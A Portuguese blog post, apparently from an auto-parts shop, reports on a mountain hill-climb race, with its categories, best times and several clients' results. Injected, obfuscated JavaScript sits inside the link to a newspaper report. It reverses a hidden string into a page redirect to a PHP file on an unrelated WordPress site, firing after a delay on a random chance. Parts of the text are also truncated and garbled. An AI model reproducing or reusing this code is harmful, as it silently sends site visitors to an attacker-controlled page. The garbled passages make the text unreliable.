Terceira Subida da Montanha

to é realizado a cada dois anos nos meses de novembro ou dezembro, e reúne entusiastas e pilotos que disputam o melhor tempo no trajeto da Serra da `Jazida Rio Bonito`, um de cada vez. A competição acontece num trecho de 6 quilômetros e 29 curvas, da sinuosa estrada de concreto que liga a fábrica de cimentos Itambé à mina de calcário.

to, desde carros originais (ou quase) até carros puramente de competição, passando por categorias intermediárias conforme o nível de preparação. São elas:

Street A – carros de rua originais com motor de aspiração natural (sem turbocompressor)
Street B – carros de rua equipados originalmente com turbocompressor
Super – carros de rua superesportivos, originalmente com alta potência, como Porsches, Ferraris, etc
Pro – carros preparados pra competição, mas dento de alguns limites, com por exemplo pneus de rua
Ultra – carros ou protótipos de competição, com preparação ilimitada e livre escolha de pneus

Estivemos lá e, junto com os mais de 5000 expectadores, curtimos a adrenalina da velocidade em uma tarde com os amigos e a diversão de fazer um churrasco num local com natureza exuberante, ao som do ronco dos motores de 50 diferentes carros acelerando no limite!

(foto Bruno Jollembeck)

No final do dia de evento, os melhores tempos registrados foram:

-Maurício das Neves (Peugeot XRC) melhor tempo 2:42,93
-João Paulo Wodiani (Subaru STi) melhor tempo 2:50,51
-Vitor Fischer (Mitusbishi EVO IX) melhor tempo 2:51,18
-Luiz Fernando (Audi) melhor tempo 2:57,33
-Luiz Gustavo Villella (Subaru WRX) melhor tempo 2:59,66
-Rafael Pombo (Peugeot 205) melhor tempo 2:59,74

Nossos amigos e clientes Fabio Baggio (BMW 325), João Paulo ´JP´ Wodiani e Marcel Triska (com Subaru Impreza STi e Subaru Impreza WRX) competiram e tiveram bons resultados:

-JP (que é webmaster de profissão e piloto amador nos fins de semana) faturou o primeiro lugar na sua categoria (Street-B) e segundo na geral, atrás somente do Peugeot XRC de Maurício das Neves (categoria ULTRA), que é piloto profissional de Rallyes.

Resultado excelente especialmente considerando que o seu carro é quase todo original e marcou 2:50,51s. A ótima pilotagem de JP, somado à experiência de ter participado em todos os 3 eventos realizados na montanha fizeram a diferença!

link pro youtube

-Marcel Triska ficou em quinto lugar na categoria Street-B, com o tempo de 3:07,12s. Marcel estava estreando este novo carro – da última vez participou com o seu Impreza ano 1999 – e ainda está se adaptando a ele. O piloto, que é piloto profissional da TAM Linhas Aéreas, tem uma agenda lotada, por isso até no último instante de sábado estava acertando os detalhes do seu carro para a prova.

link pro Youtube

Os dois pilotos acima tiveram o apoio profissional da MRace Tuning and Mapping Services, que prestou um ótimo serviço, onde o preparador Márcio C.Oliveira (de S.Paulo) esteve presente com seu equipamento prestando suporte in loco.

-Fabio Baggio marcou 3:14,23 e ficou em sexto lugar na Categoria PRO. O piloto, que ano passado venceu em sua categoria (Street-A), este ano fez modificações importantes em seu carro, o que o fez subir para a categoria Pro. Porém o grande número de modificações feitas ao mesmo tempo deixaram o empresário sem tempo hábil de fazer o acerto fino da suspensão, e sua BMW ficou muito arisca. Isso o fez derrapar em duas passagens, numa delas raspando no muro e avariando seu veículo; o que não o impediu de terminar as 3 subidas cronometradas, porém comprometeu o seu resultado este ano.

Seu carro teve a equipe de apoio mecânico liderada pelo preparador Riva, da Master Place.

link pro Youtube

Os três pilotos já planejam e traçam suas estratégias pra competir novamente ano que vem!

A F1 Autocenter – Revenda Motul forneceu seus produtos das marcas Motul e Pentosin para os carros, que são eles: óleo de motor, óleo de transmissão, fluido de arrefecimento e fluido de freio.

tos F1 Autocenter)

A seguir mais algumas fotos e vídeos. Dentre o material exposto, de diversas autorias, alguns foram cedidos por amigos, pelos próprios pilotos e/ou que estavam disponíveis na internet.

Link para a reportagem sobre o evento, feita pelo maior jornal do Paraná, $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomoveis/rei-da-subida-crava-novo-recorde-mas-chuva-o-impede-de-ir-mais-longe-19d0qo5g4lh31gfvw3yvly4g2″ target=”_blank”>vídeo carro Maurício das Neves

 

 

Deixe um comentário

× Compre pelo Whatsapp!